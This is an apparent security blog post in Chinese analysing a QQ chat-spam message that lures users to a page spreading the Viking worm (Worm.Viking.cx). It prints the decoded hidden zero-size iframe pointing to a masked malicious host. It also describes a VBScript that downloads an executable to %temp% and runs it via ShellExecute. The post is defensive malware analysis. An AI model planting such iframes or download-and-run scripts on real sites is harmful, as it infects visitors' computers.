传播蠕虫维金/Worm.Viking.cx的QQ尾巴换了花样

简介: 传播蠕虫维金/Worm.Viking.cx的QQ尾巴换了花样

QQ自动发送的信息为:

/-------

看看我最近的照片~~~ 才扫描到Q-Zone空间上的。是不是有点太露了?

hxxp://Q-Zone.***QQ.C0M.%34%76%30***%2E%63%6E/**Photo/Cgi_Bin&387***384/

-------/

点击该链接打开的网页首部有用自定义函数 psw()加密的JavaScript脚本代码。解密后为

/-------
<iframe src=hxxp://web**4.3***9com.org/m**s/mm***.htm width=0 height=0></iframe>
-------/

mm***.htm   的开头为 HTMLShip 加密的脚本程序,分为两个部分:

 

前一部分 解密后的代码为JavaScript编写,如下:

/-------
<script language=javascript>yS6=5633;if(document.all){function _dm(){return false};function _mdm(){document.oncontextmenu=_dm;setTimeout("_mdm()",800)};_mdm();}document.oncontextmenu=new Function("return false");function _ndm(e){if(document.layers||window.sidebar){if(e.which!=1)return false;}};if(document.layers){document.captureEvents(Event.MOUSEDOWN);document.onmousedown=_ndm;}else{document.onmouseup=_ndm;};oK74=3345;dI39=7346;function _dws(){window.status = "The page is protected by HTMLShip XP";setTimeout("_dws()",100);};_dws();kY53=6773;jQ9=4206;function _dds(){if(document.all){document.onselectstart=function (){return false};setTimeout("_dds()",700)}};_dds();iD69=5348;kH81=489;aS87=3348;mY34=4488;lL93=5630;bI58=9632;sT64=2490;;_licensed_to_="TEAM";</script>
-------/

后一部分 使用的是VBScript,其功能是利用 Adodb.Stream、Microsoft.XMLHTTP 和 Scripting.FileSystemObject 把 hxxp://web**4.3***9com.org/m**s/mm***4.exe 保存为 %temp%/g0ld.com,并利用Shell.Application 对象 的 ShellExecute 方法来运行。

Kaspersky 报为 Worm.Win32.Viking.y( http://www.viruslist.com/en/find?words=Worm.Win32.Viking.y

瑞星报为 Worm.Viking.cx。


相关文章
|
2月前
|
JavaScript 前端开发
发现一个传播威金/Worm.Win32.Viking.if的网站,用的技术很新颖
发现一个传播威金/Worm.Win32.Viking.if的网站,用的技术很新颖
|
2月前
|
监控 安全 数据安全/隐私保护
一个会下载至少3个Viking等恶意程序的网站
一个会下载至少3个Viking等恶意程序的网站
|
2月前
|
JavaScript 前端开发 数据安全/隐私保护
小心通过QQ尾巴中的网址(Q-Zone.****qq.C0M)传播的Worm.Win32.Viking.r
小心通过QQ尾巴中的网址(Q-Zone.****qq.C0M)传播的Worm.Win32.Viking.r
|
2月前
|
JavaScript 前端开发 数据安全/隐私保护
传播蠕虫维金/Worm.Viking.cx的QQ尾巴再添花样
传播蠕虫维金/Worm.Viking.cx的QQ尾巴再添花样
|
2月前
|
安全 索引 Windows
一位网友的电脑中了灰鸽子Backdoor.Gpigeon.iir
一位网友的电脑中了灰鸽子Backdoor.Gpigeon.iir
|
2月前
|
安全 JavaScript 前端开发
某光集团网站被加入利用ANI漏洞传播Worm.Win32.Viking.ix的代码
某光集团网站被加入利用ANI漏洞传播Worm.Win32.Viking.ix的代码
|
2月前
|
监控
某市河西区教育信息网被加入传播Worm.Win32.Viking.jr等的代码
某市河西区教育信息网被加入传播Worm.Win32.Viking.jr等的代码
|
2月前
|
安全
某家园论坛被植入利用ANI漏洞传播QQ盗号木马Trojan-PSW.Win32.QQPass.rj的代码
某家园论坛被植入利用ANI漏洞传播QQ盗号木马Trojan-PSW.Win32.QQPass.rj的代码
|
安全 NoSQL Linux
十字符病毒,杀不死的小强:一次服务器沦陷实录
一、现象 接到客户的电话,说自己的云服务器被提供商禁止访问了,原因是监测到网络流量爆满,服务器不停地向外发包,在确认客户没有业务量突增的情况下,初步判断可能服务器遭受了流量攻击(DDoS)。 不过按照常理来说,客户的业务系统就是一个小的Web系统,平时流量不大,影响力也一般,不至于遭受DDoS,带着这些疑问,要到了客户服务器的登录方式。
26531 0